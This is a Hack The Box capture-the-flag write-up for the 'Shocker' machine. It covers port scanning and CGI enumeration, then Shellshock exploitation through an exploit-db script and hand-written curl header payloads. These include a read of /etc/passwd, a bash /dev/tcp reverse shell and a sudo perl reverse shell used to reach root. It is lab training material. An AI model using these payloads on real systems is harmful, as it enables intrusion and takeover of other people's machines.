Shocker
Contents
Ports scan
root@kali:~/HTB/Machines/Shocker# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.56 --rate=1000
Starting masscan 1.0.5 at 2019-11-20 13:55:45 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 80/tcp on 10.10.10.56 Discovered open port 2222/tcp on 10.10.10.56
nmap
root@kali:~/HTB/Machines/Shocker# nmap -A -T4 -v 10.10.10.56 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-20 08:56 EST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Initiating Ping Scan at 08:56 Scanning 10.10.10.56 [4 ports] Completed Ping Scan at 08:56, 0.10s elapsed (1 total hosts) Initiating SYN Stealth Scan at 08:56 Scanning shocker.htb (10.10.10.56) [1000 ports] Discovered open port 80/tcp on 10.10.10.56 Discovered open port 2222/tcp on 10.10.10.56 Completed SYN Stealth Scan at 08:56, 0.73s elapsed (1000 total ports) Initiating Service scan at 08:56 Scanning 2 services on shocker.htb (10.10.10.56) Completed Service scan at 08:56, 6.10s elapsed (2 services on 1 host) Initiating OS detection (try #1) against shocker.htb (10.10.10.56) Retrying OS detection (try #2) against shocker.htb (10.10.10.56) Retrying OS detection (try #3) against shocker.htb (10.10.10.56) adjust_timeouts2: packet supposedly had rtt of -359825 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -359825 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -859734 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -859734 microseconds. Ignoring time. Retrying OS detection (try #4) against shocker.htb (10.10.10.56) adjust_timeouts2: packet supposedly had rtt of -82345 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -82345 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -282294 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -282294 microseconds. Ignoring time. Retrying OS detection (try #5) against shocker.htb (10.10.10.56) adjust_timeouts2: packet supposedly had rtt of -561851 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -561851 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -561717 microseconds. Ignoring time. adjust_timeouts2: packet supposedly had rtt of -561717 microseconds. Ignoring time. Initiating Traceroute at 08:56 Completed Traceroute at 08:56, 0.05s elapsed Initiating Parallel DNS resolution of 2 hosts. at 08:56 Completed Parallel DNS resolution of 2 hosts. at 08:56, 0.20s elapsed NSE: Script scanning 10.10.10.56. Initiating NSE at 08:56 Completed NSE at 08:56, 1.51s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.18s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Nmap scan report for shocker.htb (10.10.10.56) Host is up (0.044s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA) | 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA) |_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=11/20%OT=80%CT=1%CU=36010%PV=Y%DS=2%DC=T%G=Y%TM=5DD546 OS:15%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)SE OS:Q(SP=107%GCD=1%ISR=10D%TI=Z%II=I%TS=8)SEQ(SP=107%GCD=1%ISR=10D%TI=Z%CI=I OS:%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O3=M54DNNT11NW6%O4=M54DST11NW6%O OS:5=M54DST11NW6%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6 OS:=7120)ECN(R=Y%DF=Y%TG=40%W=7210%O=M54DNNSNW6%CC=Y%Q=)ECN(R=Y%DF=Y%T=40%W OS:=7210%O=M54DNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)T1(R= OS:Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%TG=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y% OS:DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F= OS:AR%O=%RD=0%Q=)T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T6(R=Y%DF=Y%T OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD OS:=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%TG=40%CD OS:=S)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.001 days (since Wed Nov 20 08:55:36 2019) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=263 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 111/tcp) HOP RTT ADDRESS 1 44.66 ms 10.10.14.1 2 44.79 ms shocker.htb (10.10.10.56)
NSE: Script Post-scanning. Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Initiating NSE at 08:56 Completed NSE at 08:56, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 22.22 seconds Raw packets sent: 1163 (59.330KB) | Rcvd: 4165 (169.654KB)
Web
The page source doesn't give any hint.
root@kali:~/HTB/Machines/Shocker# curl http://shocker.htb/ <!DOCTYPE html> <html> <body>
<h2>Don't Bug Me!</h2> <img src="bug.jpg" alt="bug" style="width:450px;height:350px;">
</body> </html>
Neither the image.
root@kali:~/HTB/Machines/Shocker# wget http://shocker.htb/bug.jpg --2019-11-20 09:22:16-- http://shocker.htb/bug.jpg Resolving shocker.htb (shocker.htb)... 10.10.10.56 Connecting to shocker.htb (shocker.htb)|10.10.10.56|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 36861 (36K) [image/jpeg] Saving to: ‘bug.jpg’
bug.jpg 100%[===================>] 36.00K --.-KB/s in 0.04s 2019-11-20 09:22:16 (820 KB/s) - ‘bug.jpg’ saved [36861/36861] root@kali:~/HTB/Machines/Shocker# strings bug.jpg
Web enumeration
root@kali:~/HTB/Machines/Shocker# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "txt" -f -t 1000 -u http://10.10.10.56
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: txt | HTTP method: get | Threads: 1000 | Wordlist size: 441041
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_09-21-08.log
Target: http://10.10.10.56
[09:21:08] Starting: [09:21:09] 403 - 294B - /cgi-bin/ [09:21:10] 403 - 292B - /icons/ [09:26:58] 403 - 300B - /server-status/
Task Completed
The cgi-bin folder is not listable. We enumerate it too.
root@kali:~/HTB/Machines/Shocker# python3 ../../Utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e "cgi,sh,pl,py" -f -t 1000 -u http://10.10.10.56/cgi-bin/
_|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| )
Extensions: cgi, sh, pl, py | HTTP method: get | Threads: 1000 | Wordlist size: 1102604
Error Log: /root/HTB/Utils/dirsearch/logs/errors-19-11-20_09-27-37.log
Target: http://10.10.10.56/cgi-bin/
[09:27:37] Starting: [09:27:39] 200 - 119B - /cgi-bin/user.sh
Task Completed
This CGI returns an uptime
root@kali:~/HTB/Machines/Shocker# curl http://shocker.htb/cgi-bin/user.sh Content-Type: text/plain
Just an uptime test script
09:24:04 up 6:36, 0 users, load average: 0.00, 0.00, 0.00
The hint of the target name, and a shell script, let me guess that we are facing a shellsock vulnerability.
Exploit by script
root@kali:~/HTB/Machines/Shocker# searchsploit shellshock
------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------- ----------------------------------------
Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metaspl | exploits/cgi/remote/38849.rb
Apache mod_cgi - 'Shellshock' Remote Command Injection | exploits/linux/remote/34900.py
Bash - 'Shellshock' Environment Variables Command Injection | exploits/linux/remote/34766.php
Bash CGI - 'Shellshock' Remote Command Injection (Metasploit) | exploits/cgi/webapps/34895.rb
Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock) | exploits/hardware/remote/39568.py
GNU Bash - 'Shellshock' Environment Variable Command Injection | exploits/linux/remote/34765.txt
IPFire - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) | exploits/cgi/remote/39918.rb
NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock) | exploits/cgi/webapps/40213.txt
OpenVPN 2.2.29 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34879.txt
PHP < 5.6.2 - 'Shellshock' Safe Mode / Disable Functions Bypass / Command Injection | exploits/php/webapps/35146.txt
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection | exploits/linux/remote/34896.py
RedStar 3.0 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection | exploits/linux/local/40938.py
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Sh | exploits/cgi/webapps/39887.txt
TrendMicro InterScan Web Security Virtual Appliance - 'Shellshock' Remote Command In | exploits/hardware/remote/40619.py
dhclient 4.1 - Bash Environment Variable Command Injection (Shellshock) | exploits/linux/remote/36933.py
------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
root@kali:~/HTB/Machines/Shocker# searchsploit -m 34900
Exploit: Apache mod_cgi - 'Shellshock' Remote Command Injection
URL: https://www.exploit-db.com/exploits/34900
Path: /usr/share/exploitdb/exploits/linux/remote/34900.py
File Type: a /usr/bin/env python script, ASCII text executable, with CRLF line terminators
Copied to: /root/HTB/Machines/Shocker/34900.py
root@kali:~/HTB/Machines/Shocker# python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.34 lport=4444 pages=/cgi-bin/user.sh
[!] Started reverse shell handler
[-] Trying exploit on : /cgi-bin/user.sh
[!] Successfully exploited
[!] Incoming connection from 10.10.10.56
10.10.10.56> whoami
shelly
Manual exploit
We can test the vulnerability, showing the /etc/passwd file
root@kali:~/HTB/Machines/Shocker# curl -v http://shocker.htb/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "
Run a listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444
Launch the exploit
This time we launch a reverse shell on the headers of the request.
root@kali:~/HTB/Machines/Shocker# curl -v http://shocker.htb/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.34/4444 0>&1 " * Trying 10.10.10.56:80... * TCP_NODELAY set * Connected to shocker.htb (10.10.10.56) port 80 (#0) > GET /cgi-bin/user.sh HTTP/1.1 > Host: shocker.htb > User-Agent: curl/7.66.0 > Accept: */* > custom:() { ignored; }; echo Content-Type: text/html; echo ; /bin/bash -i >& /dev/tcp/10.10.14.34/4444 0>&1
On the listener:
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lvnp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.56. Ncat: Connection from 10.10.10.56:33554. bash: no job control in this shell shelly@Shocker:/usr/lib/cgi-bin$ whoami whoami shelly
User flag
shelly@Shocker:/home/shelly$ cd /home cd /home shelly@Shocker:/home$ ls -l ls -l total 4 drwxr-xr-x 4 shelly shelly 4096 Sep 22 2017 shelly shelly@Shocker:/home$ cd shelly cd shelly shelly@Shocker:/home/shelly$ cat user.txt cat user.txt <USER_FLAG>
Root flag
shelly@Shocker:/home/shelly$ sudo -l sudo -l Matching Defaults entries for shelly on Shocker: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker: (root) NOPASSWD: /usr/bin/perl
Shelly can launch perl with sudo command.
Open second listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lnvp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555
From the shelly reverse shell
We launch a perl reverse shell from the shelly reverse shell on port 5555
shelly@Shocker:/usr/lib/cgi-bin$ sudo perl -e 'use Socket;$i="10.10.14.34";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
<IN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
On the listener
root@kali:~/HTB/Machines/Shocker# rlwrap nc -lnvp 5555 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555 Ncat: Connection from 10.10.10.56. Ncat: Connection from 10.10.10.56:48420. /bin/sh: 0: can't access tty; job control turned off # whoami root # python /bin/sh: 2: python: not found # whereis python python: /usr/bin/python3.5 /usr/bin/python3.5m /usr/lib/python3.5 /usr/lib/python2.7 /etc/python3.5 /usr/local/lib/python3.5 /usr/share/python # /usr/bin/python3.5 -c 'import pty; pty.spawn("/bin/bash")' root@Shocker:/usr/lib/cgi-bin# <CRTL Z> [1]+ Stopped rlwrap nc -lnvp 5555 root@kali:~/HTB/Machines/Shocker# stty rows 24 columns 80 root@kali:~/HTB/Machines/Shocker# stty raw -echo root@kali:~/HTB/Machines/Shocker# fg rlwrap nc -lnvp 5555 root@Shocker:/usr/lib/cgi-bin# export TERM=screen export TERM=screen root@Shocker:/usr/lib/cgi-bin# cat /root/root.txt cat /root/root.txt <ROOT FLAG>
References
Daniel Simao 18:03, 21 November 2019 (EST)
